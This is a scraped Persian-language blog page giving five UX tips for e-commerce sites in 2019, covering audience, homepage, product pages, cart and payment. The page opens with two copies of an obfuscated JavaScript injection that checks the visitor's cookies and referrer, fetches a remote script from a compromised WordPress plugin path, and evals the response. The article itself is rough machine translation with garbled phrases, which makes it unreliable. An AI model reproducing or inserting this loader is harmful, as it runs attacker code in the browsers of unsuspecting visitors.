;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

نکات UX برای وب سایت تجارت الکترونیکی شما در سال 2019

ایجاد یک تجربه کاربری عالی برای فروشگاه اینترنتی شما ، همه چیز را در مورد ساده و مفید نگه داشتن آن برای خریداران آینده نگر خود دارد. اما ، چگونه می دانیم که آیا شما کارهای درستی انجام می دهید و انتخاب های مناسبی انجام می دهید؟ چگونه می توان در طراحی تجارت الکترونیکی خود تعالی یافت؟ در ادامهبخوانید ، همانطور که ما در نظر داریم نکات ثابت شده UX را برای تراز فروش آنلاین خود در سال 2019 و بعد از آن ، فاش کنیم.
حالا بگذارید تعقیب کنیم.
پس از بازدیدکنندگان به وب سایت شما یا در صفحه اختصاصی که برای ردیابی تبدیل ها قرار گرفته اند ، ضربه بزنند ، حتماً آنها را در سایت نگه دارید و از طریق پیشنهاد شما ، بررسی محصولات و مقایسه ها ، سبد خرید ، فرم حمل و نقل ، روش های پرداخت و آنها را بدون سر و صدا طی کنید. همه چیز در بین.
ما می دانیم که این کار آسانی نیست.
به همین دلیل ما در اینجا هستیم تا به شما کمک کنیم در روند ایجاد یک تجربه کاربری هدفمند برای فروشگاه آنلاین خود ، به شما کمک کنیم.
TOP 5 نکات UX برای یک تجربه کاربری الکترونیکی بزرگ
1. مشتریان خود را بشناسید
اگر تازه شروع به کار کرده و در حال آماده سازی اولین فروشگاه الکترونیکی خود هستید ، اولین توقف باید تعیین کننده مخاطبان مورد نظر شما باشد (اشاره: این نباید همه باشد).
در مورد خریدار ایده آل محصولات یا خدمات خود فکر کنید. چه کسی ممکن است این باشد؟
برای مثال ، بگذارید بگوییم که شما صنایع دستی را بصورت آنلاین می فروشید. مشتریان ایده آل شما کسانی خواهند بود که از محصولات اصلی ، خلاق و منحصر به فرد که نمی توانند در هیچ کجای دیگری پیدا کنند ، قدردانی می کنند و آنها مایل هستند برای کارهای دستی با کیفیت بالا و صنعتگران هزینه بیشتری بپردازند.
اگر مدتی صاحب مشاغل هستید ، شانس بزرگی وجود دارد که شما در حال حاضر یک گروه بازگشت مشتری وفادار داشته باشید. و مأموریت شما باید به گسترش حلقه خریداران موجود و جذب افراد جدید اختصاص یابد. دوباره و دوباره.
همانطور که توسط لوئیس باست ، متخصص بازاریابی مستقر در انگلیس تعریف شده است ، 3 نوع خریدار معمول عبارتند از:

 • مشتریان
 • چشم اندازها
 • مظنونین

مشتریان قبلاً محصولات شما را خریداری کرده اند ، از خدمات شما استفاده کرده و با تجارت شما در تعامل هستند. آنها شما را می شناسند ، آنها به شما اعتماد دارند ، آنها عاشق کیفیت محصولات شما هستند و احتمالاً آنها دوباره از شما خرید می کنند.

چشم اندازها در آینده ، حلقه بسیار گسترده تری از افراد پیرامون مشاغل شما خواهد بود. آنها ممکن است به فکر خریدن صنایع دستی دستی و جستجوی چنین مواردی بصورت آنلاین باشند. ممکن است آنها هنوز از پیشنهادات شما اطلاع نداشته باشند ، اما آنها در حال کشف هستند.

مظنونین در وسیع ترین حلقه پیرامون تجارت شما متمرکز شده اند. آنها ممکن است در حال حاضر با شما در ارتباط نباشند ، اما ممکن است به زودی به دست شما برسند. به عنوان مثال ، ممکن است کسانی باشند که نوسازی خانه را برنامه ریزی کرده و می خواهند خانه را با صنایع دستی اصلی پر کنند. بنابراین ، آنها ممکن است در آینده نزدیک جستجوی آنها را بصورت آنلاین جستجو کنند. و آنجا می روید. بینگو!

اگر می بینید که مخاطبان درستی برای تعریف مخاطبان مناسب دارند ، باید کتاب «مایکروسافت بویلان» قدرت برای ورود به سیستم را بررسی کنید. او با استفاده از سیستمی به نام Circle of Levere ، وی یک راهنمای گام به گام ایجاد می کند که به شما در شناسایی افراد مناسب برای تجارت کمک می کند.
بنابراین ، اکنون که کاربران بالقوه خود را می شناسید ، باید پا به کفش آنها بگذارید و به عنوان خریدار بالقوه محصولات خود فکر کنید. سپس ، برای هر مرحله از راه خود و هر قدم از قیف تبدیل ، سفر خریداران را ایجاد کنید (اگر هدف مشخصی را برای فعالیتهای بازاریابی دیجیتال خود ایجاد کرده اید).

2. یک صفحه شگفت انگیز ایجاد کنید
شما زمان زیادی برای ایجاد اولین تصور از شخصی که برای اولین بار وارد وب سایت شما شده است ندارید. این مسئله چند ثانیه است.
بنابراین شما باید یک منطقه قهرمان قاتل را طراحی کنید و باعث شوید مردم عاشق صفحه اصلی شما شوند.

آن را منحصر به فرد کنید ، تصویر شگفت انگیز قهرمان ، تصویر سازی سفارشی یا یک فیلم چشم نواز را ارائه دهید که با مخاطب مورد نظر خود به روشی معنی دار صحبت می کند و با بازدید کنندگان وب سایت خود ارتباط عاطفی برقرار می کند.
سایر قوانین مهم عبارتند از:

 1. از کلمات ساده استفاده کنید
 2. صفحه را بیش از حد شلوغ نکنید
 3. از عناصر UI بیش از حد استفاده نکنید
 4. همه چیز را که تأثیر نمی گذارد از بین ببرید
 5. اطمینان حاصل کنید که آگهی های تبلیغاتی به روز هستند
 6. یک نوار پیمایش معنی دار ایجاد کنید
 7. دسته ها و زیر شاخه های خود را عاقلانه انتخاب کنید
 8. فیلترهای جستجوی کاربردی را ایجاد کنید
 9. یک دکمه Call To Action را بالای صفحه قرار دهید

ما توصیه می کنیم از یک رویکرد طراحی مینیمالیستی استفاده کنید ، صفحه اصلی تجارت الکترونیک باید از تمام نمادها ، نمادها ، پنجره های بازشو و سایر حواس پرتی های احتمالی پاک شود. و شما همیشه می توانید به استفاده از رنگ و تایپوگرافی اعتماد کنید تا صفحه شما از هم متمایز شود.
3. صفحات محصول اطلاعات را ایجاد کنید
وقتی صحبت از وب سایت تجارت الکترونیکی می شود ، صفحات محصول معمولاً صفحه مقصد کاربران شما هستند. بنابراین ، شما باید به طراحی صفحات سازه ای که در جهت تحقق همه انتظارات مشتریان شما است ، توجه ویژه ای کنید.
همانطور که در خلاصه گزارش تجارت الکترونیکی گروه Nielsen-Norman توضیح داده شده است که مهمترین یافته ها ، دستورالعمل ها و مفاهیم مربوط به نحوه رفتار مردم در خرید آنلاین را بیان می کند ، باید به خاطر داشته باشید که انواع مختلفی از رفتار خرید برای طراحی وجود دارد:

 • مرورگرها
 • محققان با جزئیات
 • شکارچیان معامله قیمت آگاهانه
 • خریداران محصول محور ، وظیفه محور
 • خریداران یک بار

گفته می شود ، شما باید صفحات محصولی را بسازید که تمام اطلاعات لازم در مورد محصولات یا خدمات خود را با جزئیات کامل پر کرده و در ادامه تصاویر با وضوح بالا از فرشتگان مختلف ، فیلم های تبلیغاتی ، بررسی محصولات و رتبه بندی مشتری ارائه می دهد.
همچنین فراموش نکنید که در صفحات محصول دارای آرد سوخاری و همچنین پیشنهادات مربوط به محصولات مرتبط ، امکان مقایسه محصول و جزئیات مربوط به در دسترس بودن محصول و زمان تخمین زده شده محصول را درج کنید.
سرانجام ، دکمه عملکردی فراخوانی به عمل را ایجاد کنید ، و اطمینان حاصل کنید که به وضوح می گوید آنچه می خواهید مشتریان خود انجام دهند ، که احتمالاً “افزودن به سبد خرید” خواهد بود. دکمه باید به اندازه مناسب ، نه خیلی کوچک ، نه خیلی بزرگ باشد ، باید فوراً قابل تشخیص باشد و در منطقه به اصطلاح CTA ، معمولاً در کنار تصاویر قرار گیرد.

4. تجربه خرید سبد خرید را فعال کنید
هنگامی که خریداران احتمالی شما روی آن دکمه CTA کلیک می کنند ، توقف بعدی آنها باید – سبد خرید. این یکی از دارایی های اساسی وب سایت تجارت الکترونیکی شما است و شما باید آن را با تجربه کاربری بی عیب و نقص در ذهن خود طراحی کنید.
ارائه بازخورد مداوم و ایجاد یک مسیر پرداخت شفاف از اهمیت فوق العاده ای در اینجا برخوردار است.
دو گزینه برای در نظر گرفتن وجود دارد:
قبل از اینکه بتوانید خرید کنید ، می توانید اصرار داشته باشید که کاربران در وب سایت خود ثبت نام کنند
شما می توانید به عنوان یک بازدید کننده مهمان گزینه ای را در اختیار کاربران قرار دهید
این بستگی به شما دارد که کدام یک را انتخاب کنید. با این حال توصیه ما این است که به همین دلیل ساده به سراغ گزینه شماره 2 بروید – هرچه کاربران شما قبل از خرید بیشتر قدم بردارند ، احتمال بیشتری وجود دارد که آنها دست از کار بردارند و دور شوند.
یکی دیگر از توصیه های مهم در مورد سبد خرید UX این است که برای اجرای گزینه ردیابی و سپس استفاده از آدرس ایمیل مشخص شده در نظر بگیرید تا یادآوری ملایمی را در مورد مراحل پرداخت و راه اندازی شده رها کنید. زیرا ، گاهی اوقات ، مردم به راحتی در اینترنت پریشان می شوند و فقط ناخواسته از وب سایت شما دور می شوند. آنها احتمالاً می خواهند برگردند و کارهایی را که آغاز کرده اند به پایان برسانند.

5- سعی نکنید گزینه های پرداخت بسیار زیادی را داشته باشید
هنگام پرداخت ، دو مورد نیز باید در نظر داشته باشید:
در مورد قیمت کل شفاف باشید
با یک تن از گزینه های پرداخت ، کاربر را تحت الشعاع قرار ندهید
ما می دانیم که دروازه پرداخت های مختلفی در دسترس است و می دانیم که با ظهور موسسات پول الکترونیکی (EMI) و کیف پول های آنلاین روش های پرداخت رو به رشد است.
این مهمترین مسئله برای مشتریان شماست ، مهم نیست که آیا آنها قصد پرداخت چند دلار یا چند هزار دلار را دارند ، شما همیشه باید در کل وجهی یک قیمت کل کریستالی شفاف تهیه کنید.

اگر هزینه حمل و نقل اضافی نیز وجود دارد ، آنهایی را که فوراً شامل می شوید یا به کاربران گزینه ای برای دیدن هزینه حمل و نقل ویژه برای کشورشان بدهید. همچنین فراموش نکنید که در صورت موجود بودن آنها را در مورد گزینه های مختلف حمل و نقل مطلع کنید.
و هنگامی که صحبت از فرم پرداخت می شود ، لطفاً مقررات حفظ حریم خصوصی داده های شخصی را دنبال کنید و مطمئن شوید که فقط اطلاعات لازم را جمع آوری می کنید. علاوه بر این ، به میکروسکوپ موجود در فرم توجه بیشتری کنید تا هر مرحله از راه کاملاً مشخص برای کاربران باشد.
برای روش های پرداخت ، کارت های اعتباری و بدهی مورد قبول خود را به کاربران اطلاع دهید و برخی از گزینه های پرداخت آنلاین را نیز در آن وارد کنید. با این وجود سعی کنید گزینشی باشید و مطمئن شوید که انتخاب شما یک دروازه پرداخت قابل تشخیص و قابل اعتماد است. مشتریان از آن قدردانی می کنند.

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای